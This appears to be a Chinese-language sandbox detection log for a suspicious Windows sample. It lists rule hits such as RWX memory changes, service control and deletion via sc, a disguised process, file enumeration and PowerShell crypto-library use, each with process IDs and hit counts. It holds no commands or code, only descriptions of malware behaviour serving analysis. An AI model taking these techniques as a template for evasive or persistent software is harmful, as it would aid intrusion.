rulename: 调用加密算法库
attck_tactics: 其他恶意行为
level: 1
matchedinfo: 恶意软件通过修改内存属性,以达到在内存中解密&执行恶意代码
num: 29
process_id: 3760
process_name: АахХееаВеАКе.exe
rulename: 修改内存地址为可读可写可执行
attck_tactics: 执行
level: 2
matchedinfo: 恶意程序通过调用命令行sc命令的方式控制服务,以达到创建恶意服务或对服务进行控制的目的
num: 185
process_id: 3760
process_name: АахХееаВеАКе.exe
rulename: 控制服务(通过命令行sc方式)
attck_tactics: 防御逃逸
level: 4
matchedinfo: 通过创建特殊进程名字的进程假装成正常程序,以达到混淆视听欺骗用户的目的
num: 228
process_id: 3760
process_name: АахХееаВеАКе.exe
rulename: 创建伪装进程
attck_tactics: 执行
level: 2
matchedinfo: 恶意程序通过打开线程,以达到操作其它线程的目的
num: 2
process_id: 1348
process_name: cmd.exe
rulename: 打开其他线程
attck_tactics: 基础信息获取
level: 1
matchedinfo: 通过文件遍历查找指定目标文件
num: 62
process_id: 1348
process_name: cmd.exe
rulename: 遍历文件
attck_tactics: 执行
level: 2
matchedinfo: 恶意程序通过调用命令行sc命令的方式控制服务,以达到创建恶意服务或对服务进行控制的目的
num: 79
process_id: 1348
process_name: cmd.exe
rulename: 控制服务(通过命令行sc方式)
attck_tactics: 执行
level: 2
matchedinfo: 恶意程序通过打开线程,以达到操作其它线程的目的
num: 2
process_id: 2524
process_name: cmd.exe
rulename: 打开其他线程
attck_tactics: 基础信息获取
level: 1
matchedinfo: 通过文件遍历查找指定目标文件
num: 62
process_id: 2524
process_name: cmd.exe
rulename: 遍历文件
attck_tactics: 执行
level: 2
matchedinfo: 恶意程序通过调用命令行sc命令的方式控制服务,以达到创建恶意服务或对服务进行控制的目的
num: 79
process_id: 2524
process_name: cmd.exe
rulename: 控制服务(通过命令行sc方式)
attck_tactics: 执行
level: 2
matchedinfo: 恶意程序通过打开线程,以达到操作其它线程的目的
num: 2
process_id: 1676
process_name: cmd.exe
rulename: 打开其他线程
attck_tactics: 基础信息获取
level: 1
matchedinfo: 通过文件遍历查找指定目标文件
num: 62
process_id: 1676
process_name: cmd.exe
rulename: 遍历文件
attck_tactics: 持久化
level: 1
matchedinfo: 恶意程序通过打开服务控制管理器(Service Control Manager),以达到对服务进行控制的目的
num: 2
process_id: 2776
process_name: sc.exe
rulename: 打开服务控制管理器
attck_tactics: 持久化
level: 2
matchedinfo: 恶意程序通过删除服务,以达到破坏系统正常功能的目的
num: 4
process_id: 2776
process_name: sc.exe
rulename: 删除服务
attck_tactics: 其他恶意行为
level: 1
matchedinfo: 一般被用于文件的加密、数据的加密传输或可能被用于勒索者病毒中
num: 5423
process_id: 1936
process_name: powershell.exe
rulename: 调用加密算法库
attck_tactics: 其他恶意行为
level: 1
matchedinfo: 恶意软件通过修改内存属性,以达到在内存中解密&执行恶意代码
num: 5640
process_id: 1936
process_name: powershell.exe
rulename: 修改内存地址为可读可写可执行
attck_tactics: 其他恶意行为
level: 2
matchedinfo: 恶意程序通过从资源段释放资源到内存中,进行解密操作
num: 6404
process_id: 1936
process_name: powershell.exe
rulename: 加载资源到内存